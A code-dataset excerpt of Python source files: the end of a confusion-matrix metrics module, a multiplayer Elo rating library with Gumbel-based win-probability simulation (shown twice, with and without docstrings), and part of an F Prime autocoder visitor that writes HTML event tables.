matrix_target = confusion_matrix / confusion_matrix.sum(axis=1, keepdims=True)
matrix_pred = confusion_matrix / confusion_matrix.sum(axis=0, keepdims=True)
matrix_all = confusion_matrix / confusion_matrix.sum()
normalize_dict = {ConfusionMatrix.TARGET: matrix_target,
ConfusionMatrix.PREDICTION: matrix_pred,
ConfusionMatrix.ALL: matrix_all}
if self.normalize == ConfusionMatrix.NO_NORM:
return confusion_matrix
matrix = normalize_dict.get(self.normalize)
if matrix[np.isnan(matrix)].size != 0:
matrix[np.isnan(matrix)] = 0
return matrix
class ConfusionMatrixMetric(Metric):
def __init__(self,
skip_channel=True,
metric_name="sensitivity",
calculation_method=False,
decrease="mean"):
super(ConfusionMatrixMetric, self).__init__()
self.confusion_matrix = _ConfusionMatrix(skip_channel=skip_channel, metric_name=metric_name,
calculation_method=calculation_method, decrease=decrease)
self.skip_channel = validator.check_value_type("skip_channel", skip_channel, [bool])
self.calculation_method = validator.check_value_type("calculation_method", calculation_method, [bool])
self.metric_name = validator.check_value_type("metric_name", metric_name, [str])
decrease_list = ["none", "mean", "sum", "mean_batch", "sum_batch", "mean_channel", "sum_channel"]
decrease = validator.check_value_type("decrease", decrease, [str])
self.decrease = validator.check_string(decrease, decrease_list, "decrease")
self.clear()
def clear(self):
self._total_num = 0
self._class_num = 0
self._total_tp = 0.0
self._total_fp = 0.0
self._total_tn = 0.0
self._total_fn = 0.0
def update(self, *inputs):
if len(inputs) != 2:
raise ValueError('ConfusionMatrixMetric need 2 inputs (y_pred, y), but got {}.'.format(len(inputs)))
y_pred = self._convert_data(inputs[0])
y = self._convert_data(inputs[1])
if self.calculation_method is True:
score, not_nans = self.confusion_matrix(y_pred, y)
not_nans = int(not_nans.item())
self._total_num += score.item() * not_nans
self._class_num += not_nans
else:
confusion_matrix = self.confusion_matrix(y_pred, y)
confusion_matrix, _ = _decrease_metric(confusion_matrix, "sum")
self._total_tp += confusion_matrix[0].item()
self._total_fp += confusion_matrix[1].item()
self._total_tn += confusion_matrix[2].item()
self._total_fn += confusion_matrix[3].item()
def eval(self):
if self.calculation_method is True:
if self._class_num == 0:
raise RuntimeError("ConfusionMatrixMetric must have at least one example before it can be computed.")
return self._total_num / self._class_num
confusion_matrix = np.array([self._total_tp, self._total_fp, self._total_tn, self._total_fn])
return _compute_confusion_matrix_metric(self.metric_name, confusion_matrix)
class _ConfusionMatrix:
def __init__(self, skip_channel=True, metric_name="hit_rate", calculation_method=False,
decrease="mean"):
super().__init__()
self.skip_channel = skip_channel
self.metric_name = metric_name
self.calculation_method = calculation_method
self.decrease = decrease
def __call__(self, y_pred, y):
if not np.all(y.astype(np.uint8) == y):
raise ValueError("y should be a binarized ndarray.")
dims = y_pred.ndim
if dims < 2:
raise ValueError("y_pred should have at least two dimensions.")
if dims == 2 or (dims == 3 and y_pred.shape[-1] == 1):
if self.calculation_method:
self.calculation_method = False
confusion_matrix = _get_confusion_matrix(y_pred=y_pred, y=y, skip_channel=self.skip_channel)
if self.calculation_method:
if isinstance(self.metric_name, str):
confusion_matrix = _compute_confusion_matrix_metric(self.metric_name, confusion_matrix)
chart, not_nans = _decrease_metric(confusion_matrix, self.decrease)
return chart, not_nans
if not self.metric_name:
raise ValueError("There should be at least one metric name.")
results = []
for metric_name in self.metric_name:
sub_confusion_matrix = _compute_confusion_matrix_metric(metric_name, confusion_matrix)
chart, not_nans = _decrease_metric(sub_confusion_matrix, self.decrease)
results.append(chart)
results.append(not_nans)
return results
return confusion_matrix
def _get_confusion_matrix(y_pred, y, skip_channel=True):
if not skip_channel:
y = y[:, 1:] if y.shape[1] > 1 else y
y_pred = y_pred[:, 1:] if y_pred.shape[1] > 1 else y_pred
y = y.astype(float)
y_pred = y_pred.astype(float)
validator.check('y_shape', y.shape, 'y_pred_shape', y_pred.shape)
batch_size, n_class = y_pred.shape[:2]
y_pred = y_pred.reshape(batch_size, n_class, -1)
y = y.reshape(batch_size, n_class, -1)
tp = ((y_pred + y) == 2).astype(float)
tn = ((y_pred + y) == 0).astype(float)
tp = tp.sum(axis=2)
tn = tn.sum(axis=2)
p = y.sum(axis=2)
n = y.shape[-1] - p
fn = p - tp
fp = n - tn
return np.stack([tp, fp, tn, fn], axis=-1)
def _decrease_mean(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = np.where(not_nans > 0, chart.sum(axis=1) / not_nans, np.zeros(1, dtype=float))
not_nans = (not_nans > 0).astype(float).sum(axis=0)
chart = np.where(not_nans > 0, chart.sum(axis=0) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum(not_nans, chart):
not_nans = not_nans.sum(axis=(0, 1))
chart = np.sum(chart, axis=(0, 1))
return not_nans, chart
def _decrease_mean_batch(not_nans, chart):
not_nans = not_nans.sum(axis=0)
chart = np.where(not_nans > 0, chart.sum(axis=0) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum_batch(not_nans, chart):
not_nans = not_nans.sum(axis=0)
chart = chart.sum(axis=0)
return not_nans, chart
def _decrease_mean_channel(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = np.where(not_nans > 0, chart.sum(axis=1) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum_channel(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = chart.sum(axis=1)
return not_nans, chart
def _decrease_none(not_nans, chart):
return not_nans, chart
def _decrease_metric(chart, decrease="mean"):
nans = np.isnan(chart)
not_nans = (~nans).astype(float)
chart[nans] = 0
decrease_dict = {"mean": _decrease_mean(not_nans, chart),
"sum": _decrease_sum(not_nans, chart),
"mean_batch": _decrease_mean_batch,
"sum_batch": _decrease_sum_batch(not_nans, chart),
"mean_channel": _decrease_mean_channel(not_nans, chart),
"sum_channel": _decrease_sum_channel(not_nans, chart),
"none": _decrease_none(not_nans, chart)}
not_nans, chart = decrease_dict.get(decrease)
return chart, not_nans
def _calculate_tpr(tp, p):
return tp, p
def _calculate_tnr(tn, n):
return tn, n
def _calculate_ppv(tp, fp):
return tp, (tp + fp)
def _calculate_npv(tn, fn):
return tn, (tn + fn)
def _calculate_fnr(fn, p):
return fn, p
def _calculate_fpr(fp, n):
return fp, n
def _calculate_fdr(tp, fp):
return fp, (fp + tp)
def _calculate_for(tn, fn):
return fn, (fn + tn)
def _calculate_pt(tp, tn, p, n):
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator = np.sqrt(tpr * (1.0 - tnr)) + tnr - 1.0
denominator = tpr + tnr - 1.0
return numerator, denominator
def _calculate_ts(tp, fp, fn):
return tp, (tp + fn + fp)
def _calculate_acc(tp, tn, p, n):
return (tp + tn), (p + n)
def _calculate_ba(tp, tn, p, n):
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator, denominator = (tpr + tnr), 2.0
return numerator, denominator
def _calculate_f1(tp, fp, fn):
return tp * 2.0, (tp * 2.0 + fn + fp)
def _calculate_mcc(tp, fp, tn, fn):
numerator = tp * tn - fp * fn
denominator = np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
return numerator, denominator
def _calculate_fm(tp, fp, p):
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
ppv = np.where((tp + fp) > 0, tp / (tp + fp), np.array(float("nan")))
numerator = np.sqrt(ppv * tpr)
denominator = 1.0
return numerator, denominator
def _calculate_bm(tp, tn, p, n):
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator = tpr + tnr - 1.0
denominator = 1.0
return numerator, denominator
def _calculate_mk(tp, fp, tn, fn):
ppv = np.where((tp + fp) > 0, tp / (tp + fp), np.array(float("nan")))
npv = np.where((tn + fn) > 0, tn / (tn + fn), np.array(float("nan")))
npv = tn / (tn + fn)
numerator = ppv + npv - 1.0
denominator = 1.0
return numerator, denominator
def _compute_confusion_matrix_metric(metric_name, confusion_matrix):
metric = _check_metric_name(metric_name)
input_dim = confusion_matrix.ndim
if input_dim == 1:
confusion_matrix = np.expand_dims(confusion_matrix, 0)
if confusion_matrix.shape[-1] != 4:
raise ValueError("The size of the last dimension of confusion_matrix should be 4.")
tp = confusion_matrix[..., 0]
fp = confusion_matrix[..., 1]
tn = confusion_matrix[..., 2]
fn = confusion_matrix[..., 3]
p = tp + fn
n = fp + tn
metric_name_dict = {"tpr": _calculate_tpr(tp, p),
"tnr": _calculate_tnr(tn, n),
"ppv": _calculate_ppv(tp, fp),
"npv": _calculate_npv(tn, fn),
"fnr": _calculate_fnr(fn, p),
"fpr": _calculate_fpr(fp, n),
"fdr": _calculate_fdr(tp, fp),
"for": _calculate_for(tn, fn),
"pt": _calculate_pt(tp, tn, p, n),
"ts": _calculate_ts(tp, fp, fn),
"acc": _calculate_acc(tp, tn, p, n),
"ba": _calculate_ba(tp, tn, p, n),
"f1": _calculate_f1(tp, fp, fn),
"mcc": _calculate_mcc(tp, fp, tn, fn),
"fm": _calculate_fm(tp, fp, p),
"bm": _calculate_bm(tp, tn, p, n),
"mk": _calculate_mk(tp, fp, tn, fn)
}
numerator, denominator = metric_name_dict.get(metric)
if isinstance(denominator, np.ndarray):
result = np.where(denominator != 0, numerator / denominator, np.array(float("nan")))
else:
result = numerator / denominator
return result
def _check_metric_name(metric_name):
metric_name = metric_name.replace(" ", "_")
metric_name = metric_name.lower()
metric_name_dict = {"sensitivity": "tpr",
"recall": "tpr",
"hit_rate": "tpr",
"true_positive_rate": "tpr",
"tpr": "tpr",
"specificity": "tnr",
"selectivity": "tnr",
"true_negative_rate": "tnr",
"tnr": "tnr",
"precision": "ppv",
"positive_predictive_value": "ppv",
"ppv": "ppv",
"negative_predictive_value": "npv",
"npv": "npv",
"miss_rate": "fnr",
"false_negative_rate": "fnr",
"fnr": "fnr",
"fall_out": "fpr",
"false_positive_rate": "fpr",
"fpr": "fpr",
"false_discovery_rate": "fdr",
"fdr": "fdr",
"false_omission_rate": "for",
"for": "for",
"prevalence_threshold": "pt",
"pt": "pt",
"threat_score": "ts",
"critical_success_index": "ts",
"ts": "ts",
"csi": "ts",
"accuracy": "acc",
"acc": "acc",
"balanced_accuracy": "ba",
"ba": "ba",
"f1_score": "f1",
"f1": "f1",
"matthews_correlation_coefficient": "mcc",
"mcc": "mcc",
"fowlkes_mallows_index": "fm",
"fm": "fm",
"informedness": "bm",
"bookmaker_informedness": "bm",
"bm": "bm",
"markedness": "mk",
"deltap": "mk",
"mk": "mk"
}
metric_name_info = metric_name_dict.get(metric_name)
if metric_name_info is None:
raise NotImplementedError("The metric is not implemented.")
return metric_name_info
| true
| true
|
f7059c170fbd2ef4ccd70edeaa67879926e52cb0
| 11,928
|
py
|
Python
|
multiBatelo/multielo.py
|
Balavignesh/badminton-elo-dashboard
|
df380afb26c89827111f7316df381408d7d19298
|
[
"MIT"
] | null | null | null |
multiBatelo/multielo.py
|
Balavignesh/badminton-elo-dashboard
|
df380afb26c89827111f7316df381408d7d19298
|
[
"MIT"
] | null | null | null |
multiBatelo/multielo.py
|
Balavignesh/badminton-elo-dashboard
|
df380afb26c89827111f7316df381408d7d19298
|
[
"MIT"
] | null | null | null |
import numpy as np
from typing import Union, List, Callable
import logging
from multiBatelo.score_functions import create_exponential_score_function
DEFAULT_K_VALUE = 32
DEFAULT_D_VALUE = 400
DEFAULT_SCORING_FUNCTION_BASE = 1
_default_logger = logging.getLogger("multielo.multielo")
class MultiElo:
"""
Generalized Elo for multiplayer matchups (also simplifies to standard Elo for 1-vs-1 matchups).
Does not allow ties.
"""
def __init__(
self,
k_value: float = DEFAULT_K_VALUE,
d_value: float = DEFAULT_D_VALUE,
score_function_base: float = DEFAULT_SCORING_FUNCTION_BASE,
custom_score_function: Callable = None,
log_base: int = 10,
logger: logging.Logger = None,
):
"""
:param k_value: K parameter in Elo algorithm that determines how much ratings increase or decrease
after each match
:param d_value: D parameter in Elo algorithm that determines how much Elo difference affects win
probability
:param score_function_base: base value to use for scoring function; scores are approximately
multiplied by this value as you improve from one place to the next (minimum allowed value is 1,
which results in a linear scoring function)
:param custom_score_function: a function that takes an integer input and returns a numpy array
of monotonically decreasing values summing to 1
:param log_base: base to use for logarithms throughout the Elo algorithm. Traditionally Elo
uses base-10 logs
:param logger: logger to use (optional)
"""
self.k = k_value
self.d = d_value
self._score_func = custom_score_function or create_exponential_score_function(base=score_function_base)
self._log_base = log_base
self.logger = logger or _default_logger
def get_new_ratings(
self,
initial_ratings: Union[List[float], np.ndarray],
result_order: List[int] = None,
) -> np.ndarray:
"""
Update ratings based on results. Takes an array of ratings before the matchup and returns an array with
the updated ratings. Provided array should be ordered by the actual results (first place finisher's
initial rating first, second place next, and so on).
Example usage:
>>> elo = MultiElo()
>>> elo.get_new_ratings([1200, 1000])
array([1207.68809835, 992.31190165])
>>> elo.get_new_ratings([1200, 1000, 1100, 900])
array([1212.01868209, 1012.15595083, 1087.84404917, 887.98131791])
:param initial_ratings: array of ratings (float values) in order of actual results
:param result_order: list where each value indicates the place the player in the same index of
initial_ratings finished in. Lower is better. Identify ties by entering the same value for players
that tied. For example, [1, 2, 3] indicates that the first listed player won, the second listed player
finished 2nd, and the third listed player finished 3rd. [1, 2, 2] would indicate that the second
and third players tied for 2nd place. (default = range(len(initial_ratings))
:return: array of updated ratings (float values) in same order as input
"""
if not isinstance(initial_ratings, np.ndarray):
initial_ratings = np.array(initial_ratings)
n = len(initial_ratings) # number of players
actual_scores = self.get_actual_scores(n, result_order)
expected_scores = self.get_expected_scores(initial_ratings)
scale_factor = self.k * (n - 1)
#print(f"scale factor: {scale_factor}")
return initial_ratings + scale_factor * (actual_scores - expected_scores)
def get_actual_scores(self, n: int, result_order: List[int] = None) -> np.ndarray:
"""
Return the scores to be awarded to the players based on the results.
:param n: number of players in the matchup
:param result_order: list indicating order of finish (see docstring for MultiElo.get_new_ratings
for more details
:return: array of length n of scores to be assigned to first place, second place, and so on
"""
# calculate actual scores according to score function, then sort in order of finish
result_order = result_order or list(range(n))
scores = self._score_func(n)
scores = scores[np.argsort(np.argsort(result_order))]
# if there are ties, average the scores of all tied players
distinct_results = set(result_order)
if len(distinct_results) != n:
for place in distinct_results:
idx = [i for i, x in enumerate(result_order) if x == place]
scores[idx] = scores[idx].mean()
self._validate_actual_scores(scores, result_order)
# print(f"calculated actual scores: {scores}")
return scores
@staticmethod
def _validate_actual_scores(scores: np.ndarray, result_order: List[int]):
if not np.allclose(1, sum(scores)):
raise ValueError("scoring function does not return scores summing to 1")
if min(scores) != 0:
# tie for last place means minimum score doesn't have to be zero,
# so only raise error if there isn't a tie for last place
last_place = max(result_order)
if result_order.count(last_place) == 1:
raise ValueError("scoring function does not return minimum value of 0")
if not np.all(np.diff(scores[np.argsort(result_order)]) <= 0):
raise ValueError("scoring function does not return monotonically decreasing values")
def get_expected_scores(self, ratings: Union[List[float], np.ndarray]) -> np.ndarray:
"""
Get the expected scores for all players given their ratings before the matchup.
:param ratings: array of ratings for each player in a matchup
:return: array of expected scores for all players
"""
#print(f"computing expected scores for {ratings}")
if not isinstance(ratings, np.ndarray):
ratings = np.array(ratings)
if ratings.ndim > 1:
raise ValueError(f"ratings should be 1-dimensional array (received {ratings.ndim})")
# get all pairwise differences
diff_mx = ratings - ratings[:, np.newaxis]
print(f"diff_mx = \n{diff_mx}")
# get individual contributions to expected score using logistic function
logistic_mx = 1 / (1 + self._log_base ** (diff_mx / self.d))
np.fill_diagonal(logistic_mx, 0)
#print(f"logistic_mx = \n{logistic_mx}")
# get each expected score (sum individual contributions, then scale)
expected_scores = logistic_mx.sum(axis=1)
n = len(ratings)
denom = n * (n - 1) / 2 # number of individual head-to-head matchups between n players
expected_scores = expected_scores / denom
# this should be guaranteed, but check to make sure
if not np.allclose(1, sum(expected_scores)):
raise ValueError("expected scores do not sum to 1")
#print(f"calculated expected scores: {expected_scores}")
return expected_scores
def simulate_win_probabilities(
self,
ratings: Union[List[float], np.ndarray],
n_sim: int = int(1e5),
seed: int = None,
) -> np.ndarray:
"""
Estimate the probability of each player finishing in each possible
place using a simulation. Returns a matrix where (i, j) values are the
probability that player i finishes in place j.
To simulate a game including players in the
ratings array, we generate a score for each player using a Gumbel
distribution. If a player has rating R, then that player's score is
sampled from a Gumbel(R, D) distribution, where D is the Elo D
parameter. Then we rank the players in descending order of their
scores to determine first place, second place, ..., last place. We
count the number of times each player finishes in each place and then
divide by the number of simulations to calculate the proportions.
We generate scores using Gumbel distributions because of the property:
~~ Gumbel(a_1, b) - Gumbel(a_2, b) ~ Logistic(a_1 - a_2, b) ~~
The Logistic(a_1 - a_2, b) distribution is the same distribution that
describes the pairwise win probability if two payers have Elo ratings
a_1 and a_2. In other words, a score sampled from Gumbel(a_1, b) will
be greater than a score sampled from Gumbel(a_2, b) with the same
probability that a player with Elo rating a_1 will beat a player with
Elo rating a_2 in a 1-on-1 matchup.
:param ratings: array of ratings of the players involved
:param n_sim: number of simulations to run
:param seed: (optional) seed for random number generation
:return: matrix (a numpy array) where (i, j) values are the probability
that player i finishes in place j
"""
if seed is not None:
np.random.seed(seed)
# sort so we always get the same result for same distinct ratings, but
# keep track of original order
idx = np.argsort(ratings)
ratings = sorted(ratings)
# simulate n_sim scores for each player from Gumbel distributions
n_players = len(ratings)
n_sim = int(n_sim)
scores = np.zeros((n_players, n_sim))
#print(f"simulating {n_sim:,} scores for each player")
for i, rating in enumerate(ratings):
scores[idx[i], :] = _gumbel_sample(
loc=rating,
scale=self.d,
size=int(n_sim),
base=self._log_base
)
#print(f"finished sampling {n_sim:,} scores for player {i+1} of {n_players}")
# use the scores to decide the order of finish (highest score wins) and
# create matrix with proportion of times each player finishes in each place
result_mx = self._convert_scores_to_result_proportions(scores)
#print(f"finished simulation")
return result_mx
@staticmethod
def _convert_scores_to_result_proportions(scores: np.ndarray) -> np.ndarray:
"""
Take an array of scores with one row per player and one column per
simulation, and return a matrix with one row per player and one column
per place. Each (row, col) value in the returned matrix is the count of
times player "row" finished in place "col".
"""
# sort scores from high to low for each simulation
results = np.argsort(-scores, axis=0)
# put it into a matrix where row = player, column = place, value = count
# of times player finished in place
n = scores.shape[0]
count_mx = np.zeros((n, n))
for i, x in enumerate(results):
counts = np.bincount(x, minlength=n)
count_mx[:, i] = counts
proportion_mx = count_mx / scores.shape[1]
return proportion_mx
def _gumbel_sample(
loc: float,
scale: float,
size: int = 1,
base: float = np.exp(1),
) -> np.ndarray:
"""
Sample from a Gumbel distribution (optionally with a different log base).
:param loc: location parameter for distribution
:param scale: scale parameter for distribution (> 0)
:param size: number of samples to draw
:param base: base for logarithm (defaults to natural log)
:return: sample(s) from Gumbel distribution
"""
if scale <= 0:
raise ValueError("scale parameter for Gumbel distribution must be > 0")
p = np.random.rand(int(size))
return loc - scale * _log(-_log(p, base=base), base=base)
def _log(x, base=np.exp(1)):
return np.log(x) / np.log(base)
| 44.674157
| 111
| 0.655349
|
import numpy as np
from typing import Union, List, Callable
import logging
from multiBatelo.score_functions import create_exponential_score_function
DEFAULT_K_VALUE = 32
DEFAULT_D_VALUE = 400
DEFAULT_SCORING_FUNCTION_BASE = 1
_default_logger = logging.getLogger("multielo.multielo")
class MultiElo:
def __init__(
self,
k_value: float = DEFAULT_K_VALUE,
d_value: float = DEFAULT_D_VALUE,
score_function_base: float = DEFAULT_SCORING_FUNCTION_BASE,
custom_score_function: Callable = None,
log_base: int = 10,
logger: logging.Logger = None,
):
self.k = k_value
self.d = d_value
self._score_func = custom_score_function or create_exponential_score_function(base=score_function_base)
self._log_base = log_base
self.logger = logger or _default_logger
def get_new_ratings(
self,
initial_ratings: Union[List[float], np.ndarray],
result_order: List[int] = None,
) -> np.ndarray:
if not isinstance(initial_ratings, np.ndarray):
initial_ratings = np.array(initial_ratings)
n = len(initial_ratings)
actual_scores = self.get_actual_scores(n, result_order)
expected_scores = self.get_expected_scores(initial_ratings)
scale_factor = self.k * (n - 1)
return initial_ratings + scale_factor * (actual_scores - expected_scores)
def get_actual_scores(self, n: int, result_order: List[int] = None) -> np.ndarray:
result_order = result_order or list(range(n))
scores = self._score_func(n)
scores = scores[np.argsort(np.argsort(result_order))]
distinct_results = set(result_order)
if len(distinct_results) != n:
for place in distinct_results:
idx = [i for i, x in enumerate(result_order) if x == place]
scores[idx] = scores[idx].mean()
self._validate_actual_scores(scores, result_order)
return scores
@staticmethod
def _validate_actual_scores(scores: np.ndarray, result_order: List[int]):
if not np.allclose(1, sum(scores)):
raise ValueError("scoring function does not return scores summing to 1")
if min(scores) != 0:
# so only raise error if there isn't a tie for last place
last_place = max(result_order)
if result_order.count(last_place) == 1:
raise ValueError("scoring function does not return minimum value of 0")
if not np.all(np.diff(scores[np.argsort(result_order)]) <= 0):
raise ValueError("scoring function does not return monotonically decreasing values")
def get_expected_scores(self, ratings: Union[List[float], np.ndarray]) -> np.ndarray:
if not isinstance(ratings, np.ndarray):
ratings = np.array(ratings)
if ratings.ndim > 1:
raise ValueError(f"ratings should be 1-dimensional array (received {ratings.ndim})")
diff_mx = ratings - ratings[:, np.newaxis]
print(f"diff_mx = \n{diff_mx}")
logistic_mx = 1 / (1 + self._log_base ** (diff_mx / self.d))
np.fill_diagonal(logistic_mx, 0)
expected_scores = logistic_mx.sum(axis=1)
n = len(ratings)
denom = n * (n - 1) / 2
expected_scores = expected_scores / denom
if not np.allclose(1, sum(expected_scores)):
raise ValueError("expected scores do not sum to 1")
return expected_scores
def simulate_win_probabilities(
self,
ratings: Union[List[float], np.ndarray],
n_sim: int = int(1e5),
seed: int = None,
) -> np.ndarray:
if seed is not None:
np.random.seed(seed)
idx = np.argsort(ratings)
ratings = sorted(ratings)
n_players = len(ratings)
n_sim = int(n_sim)
scores = np.zeros((n_players, n_sim))
for i, rating in enumerate(ratings):
scores[idx[i], :] = _gumbel_sample(
loc=rating,
scale=self.d,
size=int(n_sim),
base=self._log_base
)
result_mx = self._convert_scores_to_result_proportions(scores)
return result_mx
@staticmethod
def _convert_scores_to_result_proportions(scores: np.ndarray) -> np.ndarray:
results = np.argsort(-scores, axis=0)
n = scores.shape[0]
count_mx = np.zeros((n, n))
for i, x in enumerate(results):
counts = np.bincount(x, minlength=n)
count_mx[:, i] = counts
proportion_mx = count_mx / scores.shape[1]
return proportion_mx
def _gumbel_sample(
loc: float,
scale: float,
size: int = 1,
base: float = np.exp(1),
) -> np.ndarray:
if scale <= 0:
raise ValueError("scale parameter for Gumbel distribution must be > 0")
p = np.random.rand(int(size))
return loc - scale * _log(-_log(p, base=base), base=base)
def _log(x, base=np.exp(1)):
return np.log(x) / np.log(base)
| true
| true
|
f7059d3b8fda64f363f295486c2fbf3de3035548
| 7,411
|
py
|
Python
|
Autocoders/Python/src/fprime_ac/generators/visitors/InstanceTopologyEventsHTMLVisitor.py
|
LeStarch/lgtm-fprime
|
904b0311fe647745b29075d44259d1dc1f4284ae
|
[
"Apache-2.0"
] | null | null | null |
Autocoders/Python/src/fprime_ac/generators/visitors/InstanceTopologyEventsHTMLVisitor.py
|
LeStarch/lgtm-fprime
|
904b0311fe647745b29075d44259d1dc1f4284ae
|
[
"Apache-2.0"
] | null | null | null |
Autocoders/Python/src/fprime_ac/generators/visitors/InstanceTopologyEventsHTMLVisitor.py
|
LeStarch/lgtm-fprime
|
904b0311fe647745b29075d44259d1dc1f4284ae
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# NAME: InstanceTopologyHTMLVisitor.py
#
# DESCRIPTION: A visitor responsible for the generation of HTML tables
# of event ID's, etc.
#
# AUTHOR: reder
# EMAIL: reder@jpl.nasa.gov
# DATE CREATED : Sep. 13, 2016
#
# Copyright 2016, California Institute of Technology.
# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.
# ===============================================================================
#
# Python standard modules
#
import logging
import os
import sys
from fprime_ac.generators import formatters
# from fprime_ac.utils import DiffAndRename
from fprime_ac.generators.visitors import AbstractVisitor
from fprime_ac.models import ModelParser
#
# Python extention modules and custom interfaces
#
# from Cheetah import Template
# from fprime_ac.utils import version
from fprime_ac.utils import ConfigManager
#
# Import precompiled templates here
#
try:
from fprime_ac.generators.templates.html import HtmlEventsTablePage
except ImportError:
print("ERROR: must generate python templates first.")
sys.exit(-1)
#
# Universal globals used within module go here.
# (DO NOT USE MANY!)
#
# Global logger init. below.
PRINT = logging.getLogger("output")
DEBUG = logging.getLogger("debug")
#
# Module class or classes go here.
class InstanceTopologyEventsHTMLVisitor(AbstractVisitor.AbstractVisitor):
"""
A visitor class responsible for generation of component header
classes in C++.
"""
__instance = None
__config = None
__fp_dict = None
__form = None
__form_comment = None
__model_parser = None
def __init__(self):
"""
Constructor.
"""
super().__init__()
# self.initBase(self, "HTMLCmdTable")
self.__config = ConfigManager.ConfigManager.getInstance()
self.__form = formatters.Formatters()
self.__form_comment = formatters.CommentFormatters()
self.__model_parser = ModelParser.ModelParser.getInstance()
self.__cmd_dir = "events"
DEBUG.info("InstanceTopologyHTMLVisitor: Instanced.")
self.bodytext = ""
self.prototypetext = ""
self.__fp_dict = (
dict()
) # dictionary of instance name keyword to file handle pointer
def _writeTmpl(self, instance, c, visit_str):
"""
Wrapper to write tmpl to files desc.
"""
DEBUG.debug("InstanceTopologyHTMLVisitor:%s" % visit_str)
DEBUG.debug("===================================")
DEBUG.debug(c)
self.__fp_dict[instance].writelines(c.__str__())
DEBUG.debug("===================================")
def initFilesVisit(self, obj):
"""
Defined to generate files for generated code products.
@parms obj: the instance of the model to visit.
"""
# Check for command dir here and if none creat it but always switch into it
if not os.path.exists(self.__cmd_dir):
os.mkdir(self.__cmd_dir)
os.chdir(self.__cmd_dir)
# Iterate over types
for k in list(obj.get_base_id_dict().keys()):
tlist = obj.get_base_id_dict()[k]
# print "Type: %s\n" % k,
# Iterate over instances and get name
# Open file if events exist if not do nothing
for t in tlist:
# print "\tInstance: %s, Base ID: %s\n" % (t[0],t[1])
name = t[0]
events_list = t[3].get_comp_xml().get_events()
if len(events_list) > 0:
filename = "%s_events.html" % t[0]
# Open file for writing here...
DEBUG.info("Open file: %s" % filename)
try:
self.__fp_dict[name] = open(filename, "w")
DEBUG.info("Completed")
except OSError:
PRINT.info("Could not open %s file." % filename)
sys.exit(-1)
DEBUG.info(
"Generating HTML Event Table for %s:%s component instance..."
% (t[0], k)
)
os.chdir("..")
def startSourceFilesVisit(self, obj):
"""
Defined to generate starting static code within files.
"""
def includes1Visit(self, obj):
"""
Defined to generate includes within a file.
Usually used for the base classes but also for Port types
@parms args: the instance of the concrete element to operation on.
"""
def includes2Visit(self, obj):
"""
Defined to generate internal includes within a file.
Usually used for data type includes and system includes.
@parms args: the instance of the concrete element to operation on.
"""
def namespaceVisit(self, obj):
"""
Defined to generate namespace code within a file.
Also any pre-condition code is generated.
@parms args: the instance of the concrete element to operation on.
"""
def eventArgsStr(self):
"""
Make a list of event args into a string
"""
def f(args):
def g(lst):
name = lst[0]
return name
return self.argsString(list(map(g, args)))
return f
def publicVisit(self, obj):
"""
Defined to generate public stuff within a class.
@parms args: the instance of the concrete element to operation on.
"""
# os.chdir(self.__cmd_dir)
c = HtmlEventsTablePage.HtmlEventsTablePage()
for k in list(obj.get_base_id_dict().keys()):
tlist = obj.get_base_id_dict()[k]
# print "Type: %s\n" % k,
for t in tlist:
if t[0] in list(self.__fp_dict.keys()):
# print "\tInstance: %s, Base ID: %s\n" % (t[0],t[1])
eobj = t[3].get_comp_xml()
c.name = "{}:{}".format(t[0], k)
c.base_id = t[1]
c.has_events = len(eobj.get_events()) > 0
c.events = self.__model_parser.getEventsList(eobj)
c.event_enums = self.__model_parser.getEventEnumList(eobj)
c.event_args = self.__model_parser.getEventArgsDict(eobj)
c.event_params = c.event_args
c.event_args_str = self.eventArgsStr()
c.event_param_strs = self.__model_parser.getEventArgsPrototypeStringDict(
eobj
)
self._writeTmpl(t[0], c, "InstanceTopologyEventsHTML_Visitor")
def protectedVisit(self, obj):
"""
Defined to generate protected stuff within a class.
@parms args: the instance of the concrete element to operation on.
"""
def privateVisit(self, obj):
"""
Defined to generate private stuff within a class.
@parms args: the instance of the concrete element to operation on.
"""
def finishSourceFilesVisit(self, obj):
"""
Defined to generate ending static code within files.
"""
for fp in list(self.__fp_dict.keys()):
self.__fp_dict[fp].close()
PRINT.info("Completed generating HTML event tables...")
| 34.793427
| 93
| 0.568344
|
#
# AUTHOR: reder
# EMAIL: reder@jpl.nasa.gov
# DATE CREATED : Sep. 13, 2016
#
# Copyright 2016, California Institute of Technology.
# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.
# ===============================================================================
#
# Python standard modules
#
import logging
import os
import sys
from fprime_ac.generators import formatters
# from fprime_ac.utils import DiffAndRename
from fprime_ac.generators.visitors import AbstractVisitor
from fprime_ac.models import ModelParser
#
# Python extention modules and custom interfaces
#
# from Cheetah import Template
# from fprime_ac.utils import version
from fprime_ac.utils import ConfigManager
#
# Import precompiled templates here
#
try:
from fprime_ac.generators.templates.html import HtmlEventsTablePage
except ImportError:
print("ERROR: must generate python templates first.")
sys.exit(-1)
#
# Universal globals used within module go here.
# (DO NOT USE MANY!)
#
# Global logger init. below.
PRINT = logging.getLogger("output")
DEBUG = logging.getLogger("debug")
#
# Module class or classes go here.
class InstanceTopologyEventsHTMLVisitor(AbstractVisitor.AbstractVisitor):
__instance = None
__config = None
__fp_dict = None
__form = None
__form_comment = None
__model_parser = None
def __init__(self):
super().__init__()
# self.initBase(self, "HTMLCmdTable")
self.__config = ConfigManager.ConfigManager.getInstance()
self.__form = formatters.Formatters()
self.__form_comment = formatters.CommentFormatters()
self.__model_parser = ModelParser.ModelParser.getInstance()
self.__cmd_dir = "events"
